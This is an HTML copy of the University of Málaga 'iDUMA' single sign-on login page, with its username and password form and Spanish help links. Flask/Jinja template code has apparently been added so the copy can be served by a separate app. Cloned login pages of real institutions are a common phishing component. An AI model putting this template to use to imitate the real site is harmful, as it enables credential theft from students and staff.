<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html data-lt-installed="true" class=" uaxlmvepgj idc0_343">


<link rel="apple-touch-icon" sizes="57x57" href="static/themes/uma2016/images/favicon/apple-icon-57x57.png">
<link rel="apple-touch-icon" sizes="60x60" href="static/themes/uma2016/images/favicon/apple-icon-60x60.png">
<link rel="apple-touch-icon" sizes="72x72" href="static/themes/uma2016/images/favicon/apple-icon-72x72.png">
<link rel="apple-touch-icon" sizes="76x76" href="static/themes/uma2016/images/favicon/apple-icon-76x76.png">
<link rel="apple-touch-icon" sizes="114x114" href="static/themes/uma2016/images/favicon/apple-icon-114x114.png">
<link rel="apple-touch-icon" sizes="120x120" href="static/themes/uma2016/images/favicon/apple-icon-120x120.png">
<link rel="apple-touch-icon" sizes="144x144" href="static/themes/uma2016/images/favicon/apple-icon-144x144.png">
<link rel="apple-touch-icon" sizes="152x152" href="static/themes/uma2016/images/favicon/apple-icon-152x152.png">
<link rel="apple-touch-icon" sizes="180x180" href="static/themes/uma2016/images/favicon/apple-icon-180x180.png">
<link rel="icon" type="image/png" sizes="192x192" href="static/themes/uma2016/images/favicon/android-icon-192x192.png">
<link rel="icon" type="image/png" sizes="32x32" href="static/themes/uma2016/images/favicon/favicon-32x32.png">
<link rel="icon" type="image/png" sizes="96x96" href="static/themes/uma2016/images/favicon/favicon-96x96.png">
<link rel="icon" type="image/png" sizes="16x16" href="static/themes/uma2016/images/favicon/favicon-16x16.png">
<link rel="manifest" href="static/themes/uma2016/images/favicon/manifest.json">

<head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

    <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no">
    <link href="static/colors.min.css" rel="stylesheet" type="text/css" media="screen">
    <script type="text/javascript" src="static/i18n.min.js"></script>
    <link href="static/styles.min.css" rel="stylesheet" type="text/css" media="screen">
    <link href="static/jquery-ui.min.css" rel="stylesheet" type="text/css" media="screen">
    <link href="static/styles_ie.min.css" rel="stylesheet" type="text/css">
    <!-- start specific UMA -->
    <link href="static/styles_uma.min.css" rel="stylesheet" type="text/css" media="screen">
    <!-- end specific UMA -->
    <script nonce="" type="text/javascript" src="static/jquery.min.js"></script>
    <script type="text/javascript" src="static/jquery-ui.min.js"></script>
    <link href="static/keyboard.min.css" rel="stylesheet" type="text/css" media="screen">
    <link href="static/keyboard-previewkeyset.min.css" rel="stylesheet" type="text/css" media="screen">
    <script type="text/javascript" src="static/jquery.keyboard.js"></script>
    <script type="text/javascript" src="static/jquery.keyboard.extension-all.min.js"></script>
    <script type="text/javascript" src="static/spanish.min.js"></script>
    <script type="text/javascript" src="static/catalan.min.js"></script>
    <script type="text/javascript" src="static/es.min.js"></script>

    <script type="text/javascript" src="static/common.min.js"></script>
    <!-- start specific UMA -->
    <script type="text/javascript" src="static/tab_change_uma.js"></script>

    <!-- end specific UMA -->

    <title>iDUMA - Servicio de Identidad de la Universidad de Málaga</title>
</head>

<body>
    <div id="no_scroll">
        <div id="blue_bar">
            <div id="langs"><span id="es" class="highlight_lang">Español</span> | <span id="en">English</span></div>
        </div>
        <div id="cream_bar">
            <div id="org_logo" style="visibility: hidden; display: none;">
                <a href="https://www.uma.es/" title="UMA">
                    <img id="logo_img" src="static/uma-logo-header.png">
                </a>
            </div>
        </div>
        <div id="main">
            <div id="content"
                style="background-image: url(&quot;https://idp.uma.es/adas/themes/uma/static/img/tab_login_uma.png&quot;); min-height: 505px; margin-top: 30px; background-position: 25px center;">
                <div id="adas_logo" style="margin-top: 12px; margin-left: 72px; float: left;">
                    <a href="https://www.uma.es/" title="UMA">
                        <img id="logo_img" src="static/uma-logo-header.png">
                    </a>
                </div>
                <div id="contenedor_titulillo">
                    <!--                        <div id="el_titulo"> -->
                    <h1 id="texto_titulo" style="font-size: 18pt; font-weight: normal;">iDUMA - Servicio de Identidad de
                        la Universidad de Málaga</h1>
                    <h5 class="subtitle" id="texto_subtitulo">Autenticación centralizada</h5>
                    <!--                        </div>  -->
                </div>
                <div class="bloque" style="margin-top: 5px;">
                    <div id="identificacion">
                        <div id="par">
                            <!-- start specific UMA -->
                            <h2 id="titulo_1col">Identificación de usuario</h2>
                            <a href="https://duma.uma.es/directorio/ayuda/identificacion/">
                                <img id="question1" src="static/question-24px.png">
                            </a>
                            <!-- end specific UMA -->
                            {% with messages = get_flashed_messages() %}
                            {% if messages %}
                            <div class="alert alert-danger" role="alert">
                                {{ messages[0] }}
                            </div>
                            {% endif %}
                            {% endwith %}
                            <!-- aqui mi form -->
                            <form nonce=""
                                action="https://idp.uma.es/adas/SAML2/SSOService.php?SAMLRequest=fZFdT4MwFIb%2FCun9KCuyzGaQ4HbhkunIQC%2B8MQXOpAm02FNE%2F71sbDoTs%2Bu%2BH32fs0DR1C2PO1upHbx3gNb5bGqF%2FPgQks4orgVK5Eo0gNwWPI0fNpy5Hm%2BNtrrQNXFiRDBWarXUCrsGTArmQxbwtNuEpLK2RU5p3%2Fdu1wgXkKaVzHNdg61cRE0PiYwm2zQjzmr4glTiEPZrlWV7topS4MmQpttTj9tWLXHWq5C8Qj6bzfe5yEufBTdsz4KZL8rbwJ%2FvCwalP8gQO1grtELZkDCP%2BRMvmEzn2dTjLOABeyFOcpp2J1Up1dt1DvkoQn6fZclknPEMBo8TBgGJFgea%2FFhsLvhejxVnqCT6ByH%2BIFzQi%2FSxquWPQ9x6lehaFl9OXNe6XxoQFkIyJTQaLX%2FvHn0D%26RelayState=ss%3Adb%3Aefac48f62230f2a5446dc75252babbfce6913fe91d2a519acbffb25a87be8b86"
                                method="post" name="formulario1" id="formulario1" data-bitwarden-watching="1">
                                <input type="hidden" name="adAS_mode" value="authn">
                                <div id="userpass">
                                    <div class="form-item" id="edit-name-wrapper">

                                        <div class="form-col1 text-question">
                                            <label id="label_user" for="edit-name"
                                                style="text-transform: capitalize;">Identificación</label>
                                        </div>
                                        <div class="form-col2">
                                            <input class="text-field" type="text" maxlength="60" name="adAS_username"
                                                id="edit-name" size="50" value="" tabindex="1">
                                        </div>
                                    </div>

                                    <div class="form-item" id="edit-pass-wrapper">


                                        <div class="form-col1 text-question">
                                            <label id="label_pass" for="edit-pass"
                                                style="text-transform: capitalize;">Contraseña</label>
                                        </div>
                                        <div class="form-col2">
                                            <input class="text-field ui-keyboard-input ui-widget-content ui-corner-all"
                                                type="password" name="adAS_password" id="edit-pass" maxlength="128"
                                                size="50" tabindex="2" value="" aria-haspopup="true" role="textbox">
                                        </div>
                                    </div>
                                    <div class="login-box">
                                        <input id="submit_ok" class="gradient " type="submit" value="Entrar"
                                            name="adAS_submit" style="margin-top: 0px;">&nbsp;
                                    </div>
                                </div>
                            </form>
                            <div id="enlaces_UMA">
                                <ul>
                                    <li>
                                        <img id="icon_nopuedoentrar" src="static/nopuedoentrar.png">
                                        <a id="ayuda_usuario" href="https://duma.uma.es/directorio/ayuda/acceso/">Soy
                                            usuario pero no puedo entrar</a>
                                    </li>


                                    <li>
                                        <img id="icon_pinuma" src="static/pin.png">
                                        <a id="pedir_pin" href="https://pinuma.uma.es/">Solicitar PIN UMA</a>
                                    </li>
                                </ul>
                            </div>
                            <div id="panelhttp" class="start_hidden">
                                <div class="start_hidden">
                                    <form nonce=""
                                        action="https://idp.uma.es/adas/SAML2/SSOService.php?SAMLRequest=fZFdT4MwFIb%2FCun9KCuyzGaQ4HbhkunIQC%2B8MQXOpAm02FNE%2F71sbDoTs%2Bu%2BH32fs0DR1C2PO1upHbx3gNb5bGqF%2FPgQks4orgVK5Eo0gNwWPI0fNpy5Hm%2BNtrrQNXFiRDBWarXUCrsGTArmQxbwtNuEpLK2RU5p3%2Fdu1wgXkKaVzHNdg61cRE0PiYwm2zQjzmr4glTiEPZrlWV7topS4MmQpttTj9tWLXHWq5C8Qj6bzfe5yEufBTdsz4KZL8rbwJ%2FvCwalP8gQO1grtELZkDCP%2BRMvmEzn2dTjLOABeyFOcpp2J1Up1dt1DvkoQn6fZclknPEMBo8TBgGJFgea%2FFhsLvhejxVnqCT6ByH%2BIFzQi%2FSxquWPQ9x6lehaFl9OXNe6XxoQFkIyJTQaLX%2FvHn0D%26RelayState=ss%3Adb%3Aefac48f62230f2a5446dc75252babbfce6913fe91d2a519acbffb25a87be8b86"
                                        method="post" name="AuthNForm" id="AuthNForm">
                                        <input type="hidden" id="adAS_i18n_theme" name="adAS_i18n_theme" value="es">
                                        <input type="submit" class="gradient" value="Aceptar" name="adAS_submit">
                                    </form>
                                </div>
                                <div id="externalauth">&nbsp;</div>
                                <p><a class="return_to_userpassword"
                                        href="https://idp.uma.es/adas/SAML2/SSOService.php?SAMLRequest=fZFdT4MwFIb%2FCun9KCuyzGaQ4HbhkunIQC%2B8MQXOpAm02FNE%2F71sbDoTs%2Bu%2BH32fs0DR1C2PO1upHbx3gNb5bGqF%2FPgQks4orgVK5Eo0gNwWPI0fNpy5Hm%2BNtrrQNXFiRDBWarXUCrsGTArmQxbwtNuEpLK2RU5p3%2Fdu1wgXkKaVzHNdg61cRE0PiYwm2zQjzmr4glTiEPZrlWV7topS4MmQpttTj9tWLXHWq5C8Qj6bzfe5yEufBTdsz4KZL8rbwJ%2FvCwalP8gQO1grtELZkDCP%2BRMvmEzn2dTjLOABeyFOcpp2J1Up1dt1DvkoQn6fZclknPEMBo8TBgGJFgea%2FFhsLvhejxVnqCT6ByH%2BIFzQi%2FSxquWPQ9x6lehaFl9OXNe6XxoQFkIyJTQaLX%2FvHn0D%26RelayState=ss%3Adb%3Aefac48f62230f2a5446dc75252babbfce6913fe91d2a519acbffb25a87be8b86">Volver
                                        atrás</a></p>
                            </div>
                        </div>


                    </div>
                </div>
                <div class="notes_texts" style="margin-top: -40px;">
                    <p id="nota1">Una vez que se haya autenticado no será necesario identificarse de nuevo para acceder
                        a otros recursos.</p>
                    <p><strong><span id="nota2">Para desconectarse, recomendamos que cierre su navegador (cerrando todas
                                las ventanas).</span></strong></p>
                </div>
            </div>

            <div id="content_middle" style="display: none; visibility: hidden;"></div>
            <div id="content_bottom" style="display: block; visibility: visible; margin-top: -40px;">
                <div class="footer">
                    <!-- start specific UMA -->
                    <img id="icon_seguridad" src="static/seguridad.png">
                    <a href="https://duma.uma.es/seguridad/">
                        <div id="informacion_seguridad">Ver información importante de SEGURIDAD</div>
                    </a>
                    <!-- end specific UMA -->
                </div>
            </div>
        </div>
        <div id="f_blue_bar"></div>
        <script type="text/javascript" src="static/index.min.js"></script>

    </div>


</body>

</html>